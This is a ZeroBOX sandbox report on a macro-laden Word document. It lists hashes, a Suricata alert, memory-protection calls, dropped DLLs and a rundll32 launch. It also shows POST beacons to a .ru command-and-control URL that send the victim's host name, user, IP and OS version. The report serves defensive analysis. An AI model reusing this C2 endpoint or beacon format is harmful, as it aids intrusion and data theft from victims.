popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

0803_6700186721.doc

VBA_macro MSOffice File GIF Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Aug. 4, 2021, 10:44 a.m. Aug. 4, 2021, 10:46 a.m.
Size 539.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Mr.Administrator, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Aug 3 10:29:00 2021, Last Saved Time/Date: Tue Aug 3 10:29:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 19, Security: 0
MD5 52e17e1d3122e3157cb40e9b57711bc6
SHA256 0ff10f0cb0122c42bd2589dca5725782f4742f0267a10924c33099f0267425ac
CRC32 10E78B97
ssdeep 12288:pV9iQsDr8NQhqNrdjqLCV8L/EnqO1BKI9vIOaCuQByhC1A5vU:pVXkr8NpNrAmqL/EnJ1BsrPzhN58
Yara
  • Microsoft_Office_File_Zero - Microsoft Office File
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49166 -> 54.243.175.83:80 2021997 ET POLICY External IP Lookup api.ipify.org Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
suspicious_features POST method with no referer header suspicious_request POST http://arviskeist.ru/8/forum.php
request GET http://api.ipify.org/
request POST http://arviskeist.ru/8/forum.php
request POST http://arviskeist.ru/8/forum.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aaad000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a6be000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0
domain api.ipify.org
file c:\Users\test22\AppData\Roaming\microsoft\templates\~$qq.doc
file C:\Users\test22\AppData\Local\Temp\~$03_6700186721.doc
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\qq.doc.LNK
file C:\Users\test22\AppData\Local\Temp\ter.dll
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000049c
filepath: C:\Users\test22\AppData\Local\Temp\~$03_6700186721.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$03_6700186721.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000065c
filepath: c:\Users\test22\AppData\Roaming\microsoft\templates\~$qq.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\c:\users\test22\appdata\roaming\microsoft\templates\~$qq.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\qq.doc.LNK
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 0
family: 2
1 0 0
parent_process winword.exe martian_process rundll32 c:\users\test22\appdata\roaming\microsoft\templates\ier.dll,NXYSYMIUJMD
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=0308_spnv5&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
0 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=0308_spnv5&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
0 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=0308_spnv5&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
1 1 0
file C:\Users\test22\AppData\Local\Temp\ter.dll
dead_host 212.193.48.110:80
dead_host 45.129.237.96:80